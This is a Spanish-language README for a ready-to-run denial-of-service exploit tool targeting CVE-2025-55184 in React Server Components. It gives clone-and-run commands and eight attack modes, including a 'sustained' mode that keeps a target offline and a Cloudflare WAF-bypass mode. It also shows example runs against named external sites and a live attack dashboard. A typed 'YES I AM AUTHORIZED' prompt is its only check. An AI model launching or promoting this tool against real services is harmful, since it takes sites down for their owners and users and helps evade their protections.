Marco de explotación de Denegación de Servicio (DoS) de grado profesional para CVE-2025-55184 dirigido a Componentes del Servidor React. Cuenta con 8 modos de ataque, evasión de WAF y más de 10 variantes de payload para pruebas de seguridad autorizadas y caza de bugs.
"KEEP LEARNING KEEP HACKING" - CyberTechAjju
🚀 Inicio Rápido • 📖 Documentación • 💻 Características • ⚠️ Aviso Legal
CVE-2025-55184 es una vulnerabilidad de Denegación de Servicio (DoS) de alta gravedad que afecta a las implementaciones de Componentes del Servidor React (RSC). La vulnerabilidad permite a atacantes remotos causar una interrupción completa del servicio mediante cargas útiles de referencia circular especialmente diseñadas.
| Propiedad | Valor |
|---|---|
| ID CVE | CVE-2025-55184 |
| Puntuación CVSS | 7.5 (Alta) |
| Vector de Ataque | Red (Remoto) |
| Complejidad | Baja |
| Privilegios Requeridos | Ninguno (No autenticado) |
| Impacto | DoS Completo, Agotamiento de Recursos |
Esto no es solo un PoC básico: es un marco de explotación de grado profesional diseñado para investigadores de seguridad serios y cazadores de recompensas de bugs.
git clone https://github.com/CyberTechAjju/CVE-2025-55184-POC-Expolit.git
cd CVE-2025-55184-POC-Expolit
./run.sh
¡Eso es todo! Las dependencias se instalan automáticamente, el menú interactivo te guía.
# Python directamente
python3 exploit.py
# Modo CLI avanzado
python3 cve_2025_55184_exploit.py -t <target> -m scan
| Modo | Descripción | Caso de Uso |
|---|---|---|
| 1. Detectar | Huella digital pasiva | Reconocimiento seguro |
| 2. Escanear | Prueba activa de vulnerabilidad | Confirmación |
| 3. Simple | PoC de un solo disparo | Demostración rápida |
| 4. Múltiple | Multihilo (5 hilos) | Pruebas moderadas |
| 5. Agresivo | Alto impacto (10+ hilos) | Pentest autorizado |
| 6. WAF | Detección y omisión de WAF | Objetivos protegidos |
| 7. Informe | Generar documentación | Envío de bug bounty |
| 8. Sostenido | 🔥 ¡NUEVO! DoS continuo | ¡Mantiene el objetivo inactivo! |
./run.sh
# Elige: 3 (ATAQUE SOSTENIDO)
# ✅ El objetivo CAE y PERMANECE CAÍDO
# ✅ Presiona Ctrl+C → El objetivo se RECUPERA automáticamente
Perfecto para:
WAF detectados automáticamente:
Técnicas de Evasión:
¿Buscas la explotación de CVE-2025-55182? Mira este video:
▶️ Ver en YouTube: Explotación de CVE-2025-55182
╔══════════════════════════════════════════════════════════╗
║ ║
║ ______ ________ _____ ___ ___ ║
║ / ____/ / ____/ / / __ \ / _ \ / _ \ ║
║ / / __ / /_ / / \__ \ / / /_\ / /_\ \ ║
║ / /__ / \ /___/ / /___ ___/ /_/\__ /\__ / ║
║ \____/ /_____/______//____/ /_/ /_/ ║
║ ║
║ by CyberTechAjju | "KEEP LEARNING KEEP HACKING" ║
╚══════════════════════════════════════════════════════════╝
⚡ PANEL DE ATAQUE EN VIVO ⚡
┌─────────────────────────────────────────────────┐
│ Total de Peticiones │ 847 │ ✓ │
│ Ataques Exitosos │ 521 │ 💥 │
│ Tiempos de Espera │ 521 │ ⏱️ │
│ Errores │ 326 │ ❌ │
│ Tasa de Éxito │ 61.5% │ 🎯 │
└─────────────────────────────────────────────────┘
./run.sh
Enter target: http://localhost:3000
Choose: 1 (Quick Scan)
Authorization: YES I AM AUTHORIZED
# Resultados en segundos!
./run.sh
Enter target: http://vulnerable-site.com
Choose: 3 (SUSTAINED ATTACK)
Authorization: YES I AM AUTHORIZED
Type: ATTACK
# El objetivo cae
# Monitorear impacto
# Presiona Ctrl+C cuando termines
# ¡El objetivo se recupera automáticamente!
./run.sh
Enter target: https://protected.cloudflare.com
Choose: 4 (WAF Bypass)
# Detecta automáticamente Cloudflare
# Prueba variaciones de codificación
# Muestra éxito/fracaso de omisión
Esta herramienta incluye más de 10 variantes de explotación: